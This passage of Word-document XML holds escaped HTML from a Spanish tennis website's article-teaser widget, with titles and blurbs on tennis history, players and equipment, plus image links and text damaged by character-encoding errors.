    </w:p>
    <w:p w14:paraId="1AF05A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1BB9E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/div&gt;&lt;!--mvp-feat-tab-col3--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C174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/div&gt;&lt;!--mvp-feat1-list-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A445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/div&gt;&lt;!--mvp-feat1-right-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFD4B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/div&gt;&lt;!--mvp-feat1-right-out--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393AA4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/section&gt;&lt;!--mvp-feat1-wrap--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B9BC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/div&gt;&lt;!--mvp-main-box--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0578A6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"mvp-home-widget-wrap"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00951A5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731F0E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97A7C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section id = "mvp_flex_widget-11"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B05BE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"mvp-widget-home left relative mvp_flex_widget" &gt; &lt; div class = "mvp-main-box" &gt; &lt; div class = "mvp-widget-home-head" &gt; &lt; h4 class = "mvp-widget-home-title" &gt; &lt; span class = "mvp-widget-home-title" &gt; Para pasar el rato &lt; /span&gt;&lt;/h4 &gt; &lt; /div&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66596E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"mvp-widget-flex-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF43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3327B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"mvp-flex-story-wrap left relative" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A7ED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F41D0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"http://todosobretenis.com/el-sunshine-double-una-prueba-exigente/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF90A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F0891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6B37F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4F1F7D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62749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2C4503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EB43E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13DE6A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69952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52F401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75FC2F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"http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B657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7C551B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819D2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"http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A12F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5F9D18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28B4CC2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"http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0936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6B8F1F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CAD47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"http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/sunshine-double-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E93BD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14E7B0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175C00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F8969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159309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4EAFB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05C3E4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731E3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5FE85D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05DA1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2FAC0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El â€ œSunshine Doubleâ€,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B34A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una prueba exigente &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1137C4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En 35 aÃ± os,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236D9A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solo siete jugadores lo han logrado. &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECA74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77F6A7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4C77B1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26F0B4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7B57B3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6E9092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"http://todosobretenis.com/por-que-son-tan-importantes-los-antivibradores-en-las-raquetas/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C38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761F84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23676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6E6178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5A23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1904FF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FD3056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0D83AF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00265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46F636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6E86AD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"http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCA80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569EC2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39FEF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"http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C4E3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2149C55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2623C9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"http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EEB2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714166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4F702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"http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/antivibrador-1-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432FBE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19BE8C5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3E1986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44886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1D5446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51169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48176C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5A93D5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08A315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37193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745E19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Â¿ Por quÃ© son tan importantes los antivibradores en las raquetas ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEC31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En la actualidad son utilizados por la mayorÃ­ a de los jugadores. &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463B83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74379A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143011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131FEB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4A97B4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8F18E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"http://todosobretenis.com/el-tragico-hamburgo-de-monica-seles/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FFC9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60DD5A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6E930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5AEB94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AA37F7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0D5EE4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C74F4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7DCF56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6324C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22BC85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355640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"http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490361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21D0ED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7260C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"http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CD25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0E1F70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673440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"http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9859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21B093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0E08F3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"http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/monica-seles-herida-agresion-770-1-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087B6D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0227B1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47CD0F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0C5BD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5CF3BB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D5BB5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242FF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F62F8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02D9C4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747DC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1AF2224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El trÃ¡ gico Hamburgo de MÃ³ nica Seles &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5619A3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El recordado y bochornoso suceso que le puso un freno a la carrera de la serbia. &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30960E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07A5E9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02FFB3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26A2A1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48209B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25F961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"http://todosobretenis.com/moqueta-la-superficie-abandonada/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F7D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7FAB3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7BBE0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4D9C28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AB799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7091A6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EA5AC1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54C8D4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77F29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2462CF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7DB189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"http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB4D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29C79C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9D73D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"http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158F6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4CF229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011FE0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src = "http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF579A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6A49CB7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C10B0C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"http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/moqueta-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175AED3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164ACA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4E37CB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D7DD3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6F2DB9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83A41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7DE60E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DCE58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7038E7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20ABB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00C77F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Moqueta,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0065E5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la superficie abandonada &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602A82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Muy utilizada en las pistas indoor,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DF8E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fue prohibida en 2009. &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706CF9E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1FBB4F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6FE7EF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2FDDBC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68938B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7F69F3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"http://todosobretenis.com/entre-las-lineas-de-la-tinta/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA122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26AC46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A0AEE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50732D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DA197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6B50C1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41701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51AAEB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5085C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4CDC90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448DD3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"http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-400x240.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE86A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624F88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03BBE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"http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-400x240.png 400w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-300x180.png 300w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-768x461.png 768w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-590x354.png 590w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover.png 1000w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F156EC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6447FA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38696B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"http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-80x80.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F40DE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369E45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0EDC0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"http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-80x80.png 80w, http://todosobretenis.com/wp-content/uploads/2020/03/open-andre-agassi-cover-150x150.png 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C02F1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4806B4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443963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8A650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4F7333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17C56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6A0574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E58BB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5D2D5E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08440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CBD2D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Entre las lÃ­ neas de la tinta &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6088802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Fragmentos de la carrera de Rafael Nadal,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA9A9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Andre Agassi,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD9A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Roger Federer y Pete Sampras quedaron explayados en obras literarias. &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB262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027C18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6DB5D6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73EAD93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139BAE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568731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"http://todosobretenis.com/se-cumplen-13-anos-del-primer-gran-titulo-de-djokovic/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7E16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4F2D4D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7FB30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1A7056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2B10B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3D1182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3CC85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381F9A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F73FC5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0FA4B7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3D1BBD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"http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C524E6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2C973B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0D1CB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"http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-300x180.jpg 300w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-768x461.jpg 768w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-590x354.jpg 590w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440.jpg 1000w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B65BF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19791E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5699F5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"http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7CC9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2D3937B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071BFC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"http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/348456-23977629-2560-1440-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B7F5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474476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2892CD1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2D3D7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33F108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0CD8B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8698A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40227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11B4BE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DF31E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2F817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Hace 13 aÃ± os Djokovic conseguÃ­ a su primer gran tÃ­ tulo &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B99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Con 19 aÃ± os,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765D18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el serbio venciÃ³ en la final del Masters 1000 de Miami a Guillermo CaÃ± as &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C856F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5614BF6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74FF83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096FF7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/div&gt;&lt;!--mvp-flex-story--&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277629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7B31BB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"http://todosobretenis.com/pobres-leyendas/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE507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64E65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889B5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3613DA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2A0DF9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60AF81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803E71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58C550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4B49E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403F6F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5CB6E4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"http://todosobretenis.com/wp-content/uploads/2020/03/rod-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6985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3E45A2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07740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"http://todosobretenis.com/wp-content/uploads/2020/03/rod-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/rod-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FD8C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1EF4B1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2C5A2A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"http://todosobretenis.com/wp-content/uploads/2020/03/rod-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0F49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5776E9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07DF85B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"http://todosobretenis.com/wp-content/uploads/2020/03/rod-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/rod-150x150.jpg 150w, http://todosobretenis.com/wp-content/uploads/2020/03/rod-560x558.jpg 560w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251A41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7B4931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41EA70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9DE1C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38F576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BD51A6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79632E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CED3E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647F68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6CB9AA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BF9B8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Pobres leyendas &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46152AC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El tenis no siempre recompensÃ³ econÃ³ micamente a Ã­ dolos de tiempos pasados tan bien como lo hace en estos momentos &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3516C6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45B885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52DB54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4334D5C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5CFA500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09DD8F8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"http://todosobretenis.com/como-se-fabrican-las-pelotas-de-tenis/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D856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6D8BD2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810F9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2E5278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F63A7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7D2EF3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D41504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1DB132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1F76E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7C4E07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5885DA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"http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22097AB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60B649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C29C1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"http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FF1A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6DB794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36C29C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"http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6300A4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2ABE7F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91ADD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"http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-como-se-fabrican-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B10B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111FE6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0FD62F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6D792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372EAD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4B5A8A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814EA3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568F8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570492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585BF7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70E9C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Â¿ Como se fabrican las pelotas de tenis ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A278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Este increible video muestra el paso a paso de la fabricaciÃ³ n &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F9B01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62E658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39E2B0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48A9FA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3BEC32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6F5D12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"http://todosobretenis.com/el-tenis-en-la-pantalla-grande/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A1AE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35AC19C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666C7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500A21B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FBD15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03E8A7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F805DC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4A9AC4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E7361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1B8112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41B62C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"http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CA60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62E866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08A9BC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"http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-300x180.jpg 300w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-768x461.jpg 768w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-590x354.jpg 590w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630.jpg 1000w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A949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637CA0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3F265E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"http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC062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088545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BC68F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"http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/15275103950630-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B73F8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7B0D5E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div class = "mvp-flex-story-in" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE5F7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36118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6EEAE9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50D70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FAB63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D0483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1145110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1AA36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19F0C5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El tenis en la pantalla grande &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E57B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Te recomendamos las mejores tres pelÃ­ culas sobre tenis &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BEA6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56F8ED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26C79D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52FE85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0941AA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731AF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"http://todosobretenis.com/como-surgio-la-implementacion-del-ojo-de-halcon/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082CEC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3E7D42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67CA7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572954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7A76E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1D38B5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38AE9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232E58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411B2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75F8AB6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5FD4EB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"http://todosobretenis.com/wp-content/uploads/2020/03/teni-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064B5B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141237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9EE40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"http://todosobretenis.com/wp-content/uploads/2020/03/teni-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/03/teni-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2020/03/teni-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64392D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00821C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1A7DA7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"http://todosobretenis.com/wp-content/uploads/2020/03/teni-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61873C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1C3109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04124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"http://todosobretenis.com/wp-content/uploads/2020/03/teni-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/teni-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E309B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29C6020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2C4891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6F33B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6C44721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8DB04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53DED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3C860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492DEC6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1D2EE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141C4D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Â¿ CÃ³ mo surgiÃ³ la implementaciÃ³ n del ojo de halcÃ³ n ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD8E6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Tras varias fallas notorias por parte de los Ã¡ rbitros,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4813AF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la ITF decidiÃ³ utilizarlo en los partidos. &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E65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78A49C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5E1C6B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0352EE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1F8DAD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195684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"http://todosobretenis.com/por-que-las-pelotas-de-tenis-son-de-color-amarillo/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271738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40E562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B137B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75786C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7F889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04B0C12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BEDCD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3CE52E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F323DA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0574CC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"230"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE640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"http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-400x230.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5849C0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20760C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 / &gt; &lt; img width = "80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB852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193040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"http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D79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64B971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394E2C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"http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/03/pelotas-de-tenis-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071C11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5AC9AF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0654ED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32F3E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468510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9DB9B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78E672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BB5F5A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4E9D8C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D2B1C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9E959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Â¿ Por quÃ© las pelotas de tenis son de color amarillo ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18238D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Por el auge de la televisiÃ³ n,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC622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la ITF se vio obligada a modificar el color. &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4D584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213FFF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2F2A26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7F0524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034476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74959C5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"http://todosobretenis.com/cuando-roger-federer-jugo-la-primera-final-atp-de-su-carrera/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9C1D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422D9B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AB62D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6A0C70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A3960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0648E6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5C08E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3738EC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DC9436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4D2BA4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1E426F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"http://todosobretenis.com/wp-content/uploads/2020/02/roger-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB33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class = "mvp-reg-img wp-post-image"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4E7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59B79A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"http://todosobretenis.com/wp-content/uploads/2020/02/roger-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/02/roger-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73ADFE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74FE00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4F6474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"http://todosobretenis.com/wp-content/uploads/2020/02/roger-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9BC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65620D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DB8E1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"http://todosobretenis.com/wp-content/uploads/2020/02/roger-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/02/roger-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE8A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1B06AB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69F6CA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BB9BE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5FC4CE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C4547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8CE3A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AAE04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50FE9D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2E5AA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FCCCE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Cuando Roger Federer jugÃ³ la primera final ATP de su carrera &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2162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Fue el comienzo de una larga carrera &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBD02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741F0C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6631CC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1F7E27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45D0A2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700430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"http://todosobretenis.com/pedro-sousa-el-finalista-afortunado-del-argentina-open-2020/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2BE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290E87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D8240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78FA1C6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E2066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2C0610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FAD51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371177A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42754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63ECF2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142E29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"http://todosobretenis.com/wp-content/uploads/2020/02/sousa-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0A7B6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0F2CFB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BAFC8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"http://todosobretenis.com/wp-content/uploads/2020/02/sousa-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2020/02/sousa-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AABE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7E542C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7E4F31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"http://todosobretenis.com/wp-content/uploads/2020/02/sousa-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F24B6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7E77CC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54F937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"http://todosobretenis.com/wp-content/uploads/2020/02/sousa-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2020/02/sousa-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D338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7D1B97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26859A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E7F92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2F3201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62F92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6BFC37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5DD07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Buenos Aires &lt; /span&gt;&lt;span class="mvp-cd-date left relative"&gt;dÃ­as atras&lt;/span &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B709B8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A0A95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3146B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Pedro Sousa,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015C42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el finalista afortunado del Argentina Open 2020 &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B71A0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AvanzÃ³ a la final del ATP de Buenos Aires tras la baja de Schwartzman en semifinales &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61230A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185B69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05E94C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621573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6BEC2F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5EE97F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"http://todosobretenis.com/el-tenis-un-deporte-blanco/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED5E9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2F63E3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61E45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725D748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64C32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344912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24BD8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62CE41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DBAAF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1DFD64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1D16D6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"http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10399C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0D33EF0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C658D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"http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF9E1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53534E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3DF9C4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"http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F25D5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39F302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3AA2C9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"http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2019/01/delpo-blanvo-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120C81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04BE3C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112CE0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1B401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71A2A0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6E675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523B3E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5EA3F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469001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DA7C0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79CB6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Â¿ Por que se conoce al tenis como un deporte blanco ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62202B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El tenis,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072556F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tambiÃ© n conocido como el deporte blanco por su historia,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E85C7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empezÃ³ a ser jugado en las clases altas europeas.... &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3AB3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3FF9A5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674F61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6B561C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619AAD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05FBEB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a href = "http://todosobretenis.com/el-sistema-de-puntuacion-en-el-tenis-de-donde-proviene/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9273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096FDA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32138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4C7AE3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16A2E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018420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4D365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7CFBAC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E05E1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229E0C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245AAD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"http://todosobretenis.com/wp-content/uploads/2016/12/marcador-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BE423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2EFE2A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7C325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"http://todosobretenis.com/wp-content/uploads/2016/12/marcador-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2016/12/marcador-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2016/12/marcador-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447F2B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5DB963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2C3D59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"http://todosobretenis.com/wp-content/uploads/2016/12/marcador-80x80.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489671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4E93C9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6B449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"http://todosobretenis.com/wp-content/uploads/2016/12/marcador-80x80.jpg 80w, http://todosobretenis.com/wp-content/uploads/2016/12/marcador-150x150.jpg 150w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7682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6674D3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2AE1BC0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0F7F2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331360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95E5D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0445CE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5138F5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5A6EA2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1521F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2684C8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Â¿ De dÃ³ nde proviene el sistema de puntuaciÃ³ n del tenis ? &lt; /h2&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F101E7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Te contamos las diferentes teorÃ­ as sobre el sistema de puntuaciÃ³ n en el tenis &lt; /p&gt; &lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386EDF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10840A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349D6D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1687235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596429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728702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"http://todosobretenis.com/el-coleccionista-de-raquetas-amigo-de-vilas/"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A205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0E0681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AAA3A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5FA503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88423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604B776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A314F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60BF6B0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A7A7C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37FEB6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41AF8F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"http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-400x240.jpg"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073165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0D0E75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EBB9F5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"http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-400x240.jpg 400w, http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-1000x600.jpg 1000w, http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-590x354.jpg 590w"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDD27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054E75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2E0D7F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"http://todosobretenis.com/wp-content/uploads/2019/10/b31922a0-0131-4d86-93ed-160ef32c6a3e-80x80.jpg"</w:t>
      </w:r>
    </w:p>
